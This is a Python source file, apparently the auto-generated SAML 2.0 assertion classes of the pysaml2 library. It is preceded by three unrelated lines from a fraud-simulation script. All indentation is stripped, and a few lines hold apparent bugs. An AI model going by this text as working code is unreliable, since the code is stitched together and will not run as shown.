if block_fraudsters:
simulator.block_cards(
[transaction.CardID for transaction in data_log.itertuples() if transaction.Target == 1])
|
|
#!/usr/bin/env python
#
# Generated Mon May 2 14:23:33 2011 by parse_xsd.py version 0.4.
#
from saml2.validate import valid_ipv4, MustValueError
from saml2.validate import valid_ipv6
from saml2.validate import ShouldValueError
from saml2.validate import valid_domain_name
import saml2
from saml2 import SamlBase
import xmldsig as ds
import xmlenc as xenc
NAMESPACE = 'urn:oasis:names:tc:SAML:2.0:assertion'
XSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance'
XS_NAMESPACE = 'http://www.w3.org/2001/XMLSchema'
XSI_TYPE = '{%s}type' % XSI_NAMESPACE
XSI_NIL = '{%s}nil' % XSI_NAMESPACE
NAMEID_FORMAT_EMAILADDRESS = (
"urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress")
#NAMEID_FORMAT_UNSPECIFIED1 = (
# "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified")
NAMEID_FORMAT_UNSPECIFIED = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified")
NAMEID_FORMAT_ENCRYPTED = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:encrypted")
NAMEID_FORMAT_PERSISTENT = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:persistent")
NAMEID_FORMAT_TRANSIENT = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:transient")
NAMEID_FORMAT_ENTITY = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:entity")
PROFILE_ATTRIBUTE_BASIC = (
"urn:oasis:names:tc:SAML:2.0:profiles:attribute:basic")
AUTHN_PASSWORD = "urn:oasis:names:tc:SAML:2.0:ac:classes:Password"
AUTHN_PASSWORD_PROTECTED = \
"urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport"
NAME_FORMAT_UNSPECIFIED = (
"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified")
NAME_FORMAT_URI = "urn:oasis:names:tc:SAML:2.0:attrname-format:uri"
NAME_FORMAT_BASIC = "urn:oasis:names:tc:SAML:2.0:attrname-format:basic"
DECISION_TYPE_PERMIT = "Permit"
DECISION_TYPE_DENY = "Deny"
DECISION_TYPE_INDETERMINATE = "Indeterminate"
CONSENT_UNSPECIFIED = "urn:oasis:names:tc:SAML:2.0:consent:unspecified"
CONSENT_OBTAINED = "urn:oasis:names:tc:SAML:2.0:consent:obtained"
CONSENT_PRIOR = "urn:oasis:names:tc:SAML:2.0:consent:prior"
CONSENT_IMPLICIT = "urn:oasis:names:tc:SAML:2.0:consent:current-implicit"
CONSENT_EXPLICIT = "urn:oasis:names:tc:SAML:2.0:consent:current-explicit"
CONSENT_UNAVAILABLE = "urn:oasis:names:tc:SAML:2.0:consent:unavailable"
CONSENT_INAPPLICABLE = "urn:oasis:names:tc:SAML:2.0:consent:inapplicable"
SCM_HOLDER_OF_KEY = "urn:oasis:names:tc:SAML:2.0:cm:holder-of-key"
SCM_SENDER_VOUCHES = "urn:oasis:names:tc:SAML:2.0:cm:sender-vouches"
SCM_BEARER = "urn:oasis:names:tc:SAML:2.0:cm:bearer"
# -----------------------------------------------------------------------------
XSD = "xs:"
NS_SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"
# -----------------------------------------------------------------------------
def _decode_attribute_value(typ, text):
if typ == XSD + "string":
return text or ""
if typ == XSD + "integer" or typ == XSD + "int":
return str(int(text))
if typ == XSD + "float" or typ == XSD + "double":
return str(float(text))
if typ == XSD + "boolean":
return "%s" % (text == "true" or text == "True")
if typ == XSD + "base64Binary":
import base64
return base64.decodestring(text)
raise ValueError("type %s not supported" % type)
def _verify_value_type(typ, val):
#print "verify value type: %s, %s" % (typ, val)
if typ == XSD + "string":
try:
return str(val)
except UnicodeEncodeError:
return unicode(val)
if typ == XSD + "integer" or typ == XSD + "int":
return int(val)
if typ == XSD + "float" or typ == XSD + "double":
return float(val)
if typ == XSD + "boolean":
if val.lower() == "true" or val.lower() == "false":
pass
else:
raise ValueError("Faulty boolean value")
if typ == XSD + "base64Binary":
import base64
return base64.decodestring(val)
class AttributeValueBase(SamlBase):
def __init__(self,
text=None,
extension_elements=None,
extension_attributes=None):
self._extatt = {}
SamlBase.__init__(self,
text=None,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
if self._extatt:
self.extension_attributes = self._extatt
if not text:
self.extension_attributes = {XSI_NIL: 'true'}
else:
self.set_text(text)
def __setattr__(self, key, value):
if key == "text":
self.set_text(value)
else:
SamlBase.__setattr__(self, key, value)
def verify(self):
if not self.text:
assert self.extension_attributes
assert self.extension_attributes[XSI_NIL] == "true"
return True
else:
SamlBase.verify(self)
def set_type(self, typ):
try:
del self.extension_attributes[XSI_NIL]
except KeyError:
pass
try:
self.extension_attributes[XSI_TYPE] = typ
except AttributeError:
self._extatt[XSI_TYPE] = typ
def get_type(self):
try:
return self.extension_attributes[XSI_TYPE]
except (KeyError, AttributeError):
try:
return self._extatt[XSI_TYPE]
except KeyError:
return ""
def clear_type(self):
try:
del self.extension_attributes[XSI_TYPE]
except KeyError:
pass
try:
del self._extatt[XSI_TYPE]
except KeyError:
pass
def set_text(self, val, base64encode=False):
typ = self.get_type()
if base64encode:
import base64
val = base64.encodestring(val)
self.set_type("xs:base64Binary")
else:
if isinstance(val, basestring):
if not typ:
self.set_type("xs:string")
else:
try:
assert typ == "xs:string"
except AssertionError:
if typ == "xs:int":
_ = int(val)
elif typ == "xs:boolean":
if val.lower() not in ["true", "false"]:
raise ValueError("Not a boolean")
elif typ == "xs:float":
_ = float(val)
elif typ == "xs:base64Binary":
pass
else:
ValueError("Type and value doesn't match")
elif isinstance(val, bool):
if val:
val = "true"
else:
val = "false"
if not typ:
self.set_type("xs:boolean")
else:
assert typ == "xs:boolean"
elif isinstance(val, int):
val = str(val)
if not typ:
self.set_type("xs:integer")
else:
assert typ == "xs:integer"
elif isinstance(val, float):
val = str(val)
if not typ:
self.set_type("xs:float")
else:
assert typ == "xs:float"
elif not val:
try:
self.extension_attributes[XSI_TYPE] = typ
except AttributeError:
self._extatt[XSI_TYPE] = typ
val = ""
else:
if typ == "xs:anyType":
pass
else:
raise ValueError
SamlBase.__setattr__(self, "text", val)
return self
def harvest_element_tree(self, tree):
# Fill in the instance members from the contents of the XML tree.
for child in tree:
self._convert_element_tree_to_member(child)
for attribute, value in tree.attrib.iteritems():
self._convert_element_attribute_to_member(attribute, value)
if tree.text:
#print "set_text:", tree.text
# clear type
#self.clear_type()
self.set_text(tree.text)
try:
typ = self.extension_attributes[XSI_TYPE]
_verify_value_type(typ, getattr(self, "text"))
except KeyError:
pass
class BaseIDAbstractType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:BaseIDAbstractType element """
c_tag = 'BaseIDAbstractType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['NameQualifier'] = ('name_qualifier', 'string', False)
c_attributes['SPNameQualifier'] = ('sp_name_qualifier', 'string', False)
def __init__(self,
name_qualifier=None,
sp_name_qualifier=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.name_qualifier = name_qualifier
self.sp_name_qualifier = sp_name_qualifier
class NameIDType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:NameIDType element """
c_tag = 'NameIDType'
c_namespace = NAMESPACE
c_value_type = {'base': 'string'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['NameQualifier'] = ('name_qualifier', 'string', False)
c_attributes['SPNameQualifier'] = ('sp_name_qualifier', 'string', False)
c_attributes['Format'] = ('format', 'anyURI', False)
c_attributes['SPProvidedID'] = ('sp_provided_id', 'string', False)
def __init__(self,
name_qualifier=None,
sp_name_qualifier=None,
format=None,
sp_provided_id=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.name_qualifier = name_qualifier
self.sp_name_qualifier = sp_name_qualifier
self.format = format
self.sp_provided_id = sp_provided_id
def name_id_type__from_string(xml_string):
return saml2.create_class_from_xml_string(NameIDType_, xml_string)
class EncryptedElementType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedElementType element
"""
c_tag = 'EncryptedElementType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{http://www.w3.org/2001/04/xmlenc#}EncryptedData'] = (
'encrypted_data',
xenc.EncryptedData)
c_children['{http://www.w3.org/2001/04/xmlenc#}EncryptedKey'] = (
'encrypted_key',
[xenc.EncryptedKey])
c_cardinality['encrypted_key'] = {"min": 0}
c_child_order.extend(['encrypted_data', 'encrypted_key'])
def __init__(self,
encrypted_data=None,
encrypted_key=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.encrypted_data = encrypted_data
self.encrypted_key = encrypted_key or []
def encrypted_element_type__from_string(xml_string):
return saml2.create_class_from_xml_string(EncryptedElementType_, xml_string)
class EncryptedID(EncryptedElementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedID element """
c_tag = 'EncryptedID'
c_namespace = NAMESPACE
c_children = EncryptedElementType_.c_children.copy()
c_attributes = EncryptedElementType_.c_attributes.copy()
c_child_order = EncryptedElementType_.c_child_order[:]
c_cardinality = EncryptedElementType_.c_cardinality.copy()
def encrypted_id_from_string(xml_string):
return saml2.create_class_from_xml_string(EncryptedID, xml_string)
class Issuer(NameIDType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Issuer element """
c_tag = 'Issuer'
c_namespace = NAMESPACE
c_children = NameIDType_.c_children.copy()
c_attributes = NameIDType_.c_attributes.copy()
c_child_order = NameIDType_.c_child_order[:]
c_cardinality = NameIDType_.c_cardinality.copy()
def issuer_from_string(xml_string):
return saml2.create_class_from_xml_string(Issuer, xml_string)
class AssertionIDRef(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AssertionIDRef element """
c_tag = 'AssertionIDRef'
c_namespace = NAMESPACE
c_value_type = {'base': 'NCName'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def assertion_id_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(AssertionIDRef, xml_string)
class AssertionURIRef(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AssertionURIRef element """
c_tag = 'AssertionURIRef'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def assertion_uri_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(AssertionURIRef, xml_string)
class SubjectConfirmationDataType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationDataType
element """
c_tag = 'SubjectConfirmationDataType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['NotBefore'] = ('not_before', 'AsTime', False)
c_attributes['NotOnOrAfter'] = ('not_on_or_after', 'dateTime', False)
c_attributes['Recipient'] = ('recipient', 'anyURI', False)
c_attributes['InResponseTo'] = ('in_response_to', 'NCName', False)
c_attributes['Address'] = ('address', 'string', False)
c_any = {"namespace": "##any", "processContents": "lax", "minOccurs": "0",
"maxOccurs": "unbounded"}
c_any_attribute = {"namespace": "##other", "processContents": "lax"}
def __init__(self,
not_before=None,
not_on_or_after=None,
recipient=None,
in_response_to=None,
address=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.not_before = not_before
self.not_on_or_after = not_on_or_after
self.recipient = recipient
self.in_response_to = in_response_to
self.address = address
def subject_confirmation_data_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectConfirmationDataType_,
xml_string)
class KeyInfoConfirmationDataType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:KeyInfoConfirmationDataType
element """
c_tag = 'KeyInfoConfirmationDataType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{http://www.w3.org/2000/09/xmldsig#}KeyInfo'] = ('key_info',
[ds.KeyInfo])
c_cardinality['key_info'] = {"min": 1}
c_child_order.extend(['key_info'])
def __init__(self,
key_info=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.key_info = key_info or []
def key_info_confirmation_data_type__from_string(xml_string):
return saml2.create_class_from_xml_string(KeyInfoConfirmationDataType_,
xml_string)
class ConditionAbstractType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ConditionAbstractType
element """
c_tag = 'ConditionAbstractType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
class Audience(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Audience element """
c_tag = 'Audience'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def audience_from_string(xml_string):
return saml2.create_class_from_xml_string(Audience, xml_string)
class OneTimeUseType_(ConditionAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:OneTimeUseType element """
c_tag = 'OneTimeUseType'
c_namespace = NAMESPACE
c_children = ConditionAbstractType_.c_children.copy()
c_attributes = ConditionAbstractType_.c_attributes.copy()
c_child_order = ConditionAbstractType_.c_child_order[:]
c_cardinality = ConditionAbstractType_.c_cardinality.copy()
def one_time_use_type__from_string(xml_string):
return saml2.create_class_from_xml_string(OneTimeUseType_, xml_string)
class ProxyRestrictionType_(ConditionAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ProxyRestrictionType element
"""
c_tag = 'ProxyRestrictionType'
c_namespace = NAMESPACE
c_children = ConditionAbstractType_.c_children.copy()
c_attributes = ConditionAbstractType_.c_attributes.copy()
c_child_order = ConditionAbstractType_.c_child_order[:]
c_cardinality = ConditionAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Audience'] = ('audience',
[Audience])
c_cardinality['audience'] = {"min": 0}
c_attributes['Count'] = ('count', 'nonNegativeInteger', False)
c_child_order.extend(['audience'])
def __init__(self,
audience=None,
count=None,
text=None,
extension_elements=None,
extension_attributes=None):
ConditionAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.audience = audience or []
self.count = count
def proxy_restriction_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ProxyRestrictionType_, xml_string)
class EncryptedAssertion(EncryptedElementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedAssertion element """
c_tag = 'EncryptedAssertion'
c_namespace = NAMESPACE
c_children = EncryptedElementType_.c_children.copy()
c_attributes = EncryptedElementType_.c_attributes.copy()
c_child_order = EncryptedElementType_.c_child_order[:]
c_cardinality = EncryptedElementType_.c_cardinality.copy()
def encrypted_assertion_from_string(xml_string):
return saml2.create_class_from_xml_string(EncryptedAssertion, xml_string)
class StatementAbstractType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:StatementAbstractType element
"""
c_tag = 'StatementAbstractType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
class SubjectLocalityType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectLocalityType element """
c_tag = 'SubjectLocalityType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['Address'] = ('address', 'string', False)
c_attributes['DNSName'] = ('dns_name', 'string', False)
def __init__(self,
address=None,
dns_name=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.address = address
self.dns_name = dns_name
def subject_locality_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectLocalityType_, xml_string)
class AuthnContextClassRef(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef element
"""
c_tag = 'AuthnContextClassRef'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def authn_context_class_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextClassRef, xml_string)
class AuthnContextDeclRef(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextDeclRef element """
c_tag = 'AuthnContextDeclRef'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def authn_context_decl_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextDeclRef, xml_string)
class AuthnContextDecl(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextDecl element """
c_tag = 'AuthnContextDecl'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyType'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def authn_context_decl_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextDecl, xml_string)
class AuthenticatingAuthority(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthenticatingAuthority
element """
c_tag = 'AuthenticatingAuthority'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def authenticating_authority_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthenticatingAuthority,
xml_string)
class DecisionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:DecisionType element """
c_tag = 'DecisionType'
c_namespace = NAMESPACE
c_value_type = {'base': 'string', 'enumeration': ['Permit', 'Deny',
'Indeterminate']}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def decision_type__from_string(xml_string):
return saml2.create_class_from_xml_string(DecisionType_, xml_string)
class ActionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ActionType element """
c_tag = 'ActionType'
c_namespace = NAMESPACE
c_value_type = {'base': 'string'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['Namespace'] = ('namespace', 'anyURI', True)
def __init__(self,
namespace=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.namespace = namespace
def action_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ActionType_, xml_string)
class AttributeValue(AttributeValueBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AttributeValue element """
c_tag = 'AttributeValue'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyType'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def attribute_value_from_string(xml_string):
return saml2.create_class_from_xml_string(AttributeValue, xml_string)
class EncryptedAttribute(EncryptedElementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedAttribute element """
c_tag = 'EncryptedAttribute'
c_namespace = NAMESPACE
c_children = EncryptedElementType_.c_children.copy()
c_attributes = EncryptedElementType_.c_attributes.copy()
c_child_order = EncryptedElementType_.c_child_order[:]
c_cardinality = EncryptedElementType_.c_cardinality.copy()
def encrypted_attribute_from_string(xml_string):
return saml2.create_class_from_xml_string(EncryptedAttribute, xml_string)
class BaseID(BaseIDAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:BaseID element """
c_tag = 'BaseID'
c_namespace = NAMESPACE
c_children = BaseIDAbstractType_.c_children.copy()
c_attributes = BaseIDAbstractType_.c_attributes.copy()
c_child_order = BaseIDAbstractType_.c_child_order[:]
c_cardinality = BaseIDAbstractType_.c_cardinality.copy()
def base_id_from_string(xml_string):
return saml2.create_class_from_xml_string(BaseID, xml_string)
class NameID(NameIDType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:NameID element """
c_tag = 'NameID'
c_namespace = NAMESPACE
c_children = NameIDType_.c_children.copy()
c_attributes = NameIDType_.c_attributes.copy()
c_child_order = NameIDType_.c_child_order[:]
c_cardinality = NameIDType_.c_cardinality.copy()
def name_id_from_string(xml_string):
return saml2.create_class_from_xml_string(NameID, xml_string)
class SubjectConfirmationData(SubjectConfirmationDataType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationData
element """
c_tag = 'SubjectConfirmationData'
c_namespace = NAMESPACE
c_children = SubjectConfirmationDataType_.c_children.copy()
c_attributes = SubjectConfirmationDataType_.c_attributes.copy()
c_child_order = SubjectConfirmationDataType_.c_child_order[:]
c_cardinality = SubjectConfirmationDataType_.c_cardinality.copy()
def subject_confirmation_data_from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectConfirmationData,
xml_string)
class Condition(ConditionAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Condition element """
c_tag = 'Condition'
c_namespace = NAMESPACE
c_children = ConditionAbstractType_.c_children.copy()
c_attributes = ConditionAbstractType_.c_attributes.copy()
c_child_order = ConditionAbstractType_.c_child_order[:]
c_cardinality = ConditionAbstractType_.c_cardinality.copy()
def condition_from_string(xml_string):
return saml2.create_class_from_xml_string(Condition, xml_string)
class AudienceRestrictionType_(ConditionAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AudienceRestrictionType
element """
c_tag = 'AudienceRestrictionType'
c_namespace = NAMESPACE
c_children = ConditionAbstractType_.c_children.copy()
c_attributes = ConditionAbstractType_.c_attributes.copy()
c_child_order = ConditionAbstractType_.c_child_order[:]
c_cardinality = ConditionAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Audience'] = ('audience',
[Audience])
c_cardinality['audience'] = {"min": 1}
c_child_order.extend(['audience'])
def __init__(self,
audience=None,
text=None,
extension_elements=None,
extension_attributes=None):
ConditionAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.audience = audience or []
def audience_restriction_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AudienceRestrictionType_,
xml_string)
class OneTimeUse(OneTimeUseType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:OneTimeUse element """
c_tag = 'OneTimeUse'
c_namespace = NAMESPACE
c_children = OneTimeUseType_.c_children.copy()
c_attributes = OneTimeUseType_.c_attributes.copy()
c_child_order = OneTimeUseType_.c_child_order[:]
c_cardinality = OneTimeUseType_.c_cardinality.copy()
def one_time_use_from_string(xml_string):
return saml2.create_class_from_xml_string(OneTimeUse, xml_string)
class ProxyRestriction(ProxyRestrictionType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ProxyRestriction element """
c_tag = 'ProxyRestriction'
c_namespace = NAMESPACE
c_children = ProxyRestrictionType_.c_children.copy()
c_attributes = ProxyRestrictionType_.c_attributes.copy()
c_child_order = ProxyRestrictionType_.c_child_order[:]
c_cardinality = ProxyRestrictionType_.c_cardinality.copy()
def proxy_restriction_from_string(xml_string):
return saml2.create_class_from_xml_string(ProxyRestriction, xml_string)
class Statement(StatementAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Statement element """
c_tag = 'Statement'
c_namespace = NAMESPACE
c_children = StatementAbstractType_.c_children.copy()
c_attributes = StatementAbstractType_.c_attributes.copy()
c_child_order = StatementAbstractType_.c_child_order[:]
c_cardinality = StatementAbstractType_.c_cardinality.copy()
def statement_from_string(xml_string):
return saml2.create_class_from_xml_string(Statement, xml_string)
class SubjectLocality(SubjectLocalityType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectLocality element """
c_tag = 'SubjectLocality'
c_namespace = NAMESPACE
c_children = SubjectLocalityType_.c_children.copy()
c_attributes = SubjectLocalityType_.c_attributes.copy()
c_child_order = SubjectLocalityType_.c_child_order[:]
c_cardinality = SubjectLocalityType_.c_cardinality.copy()
def verify(self):
if self.address:
# dotted-decimal IPv4 or RFC3513 IPv6 address
if valid_ipv4(self.address) or valid_ipv6(self.address):
pass
else:
raise ShouldValueError("Not an IPv4 or IPv6 address")
elif self.dns_name:
valid_domain_name(self.dns_name)
return SubjectLocalityType_.verify(self)
def subject_locality_from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectLocality, xml_string)
class AuthnContextType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextType element """
c_tag = 'AuthnContextType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextClassRef'] = (
'authn_context_class_ref', AuthnContextClassRef)
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextDecl'] = (
'authn_context_decl',
AuthnContextDecl)
c_cardinality['authn_context_decl'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextDeclRef'] = (
'authn_context_decl_ref',
AuthnContextDeclRef)
c_cardinality['authn_context_decl_ref'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:assertion}AuthenticatingAuthority'] = (
'authenticating_authority', [AuthenticatingAuthority])
c_cardinality['authenticating_authority'] = {"min": 0}
c_child_order.extend(['authn_context_class_ref', 'authn_context_decl',
'authn_context_decl_ref', 'authenticating_authority'])
def __init__(self,
authn_context_class_ref=None,
authn_context_decl=None,
authn_context_decl_ref=None,
authenticating_authority=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.authn_context_class_ref = authn_context_class_ref
self.authn_context_decl = authn_context_decl
self.authn_context_decl_ref = authn_context_decl_ref
self.authenticating_authority = authenticating_authority or []
def verify(self):
# either <AuthnContextDecl> or <AuthnContextDeclRef> not both
if self.authn_context_decl:
assert self.authn_context_decl_ref is None
elif self.authn_context_decl_ref:
assert self.authn_context_decl is None
return SamlBase.verify(self)
def authn_context_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextType_, xml_string)
class Action(ActionType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Action element """
c_tag = 'Action'
c_namespace = NAMESPACE
c_children = ActionType_.c_children.copy()
c_attributes = ActionType_.c_attributes.copy()
c_child_order = ActionType_.c_child_order[:]
c_cardinality = ActionType_.c_cardinality.copy()
def action_from_string(xml_string):
return saml2.create_class_from_xml_string(Action, xml_string)
class AttributeType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AttributeType element """
c_tag = 'AttributeType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AttributeValue'] = (
'attribute_value',
[AttributeValue])
c_cardinality['attribute_value'] = {"min": 0}
c_attributes['Name'] = ('name', 'string', True)
c_attributes['NameFormat'] = ('name_format', 'anyURI', False)
c_attributes['FriendlyName'] = ('friendly_name', 'string', False)
c_child_order.extend(['attribute_value'])
c_any_attribute = {"namespace": "##other", "processContents": "lax"}
def __init__(self,
attribute_value=None,
name=None,
name_format=None,
friendly_name=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.attribute_value = attribute_value or []
self.name = name
self.name_format = name_format
self.friendly_name = friendly_name
def attribute_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AttributeType_, xml_string)
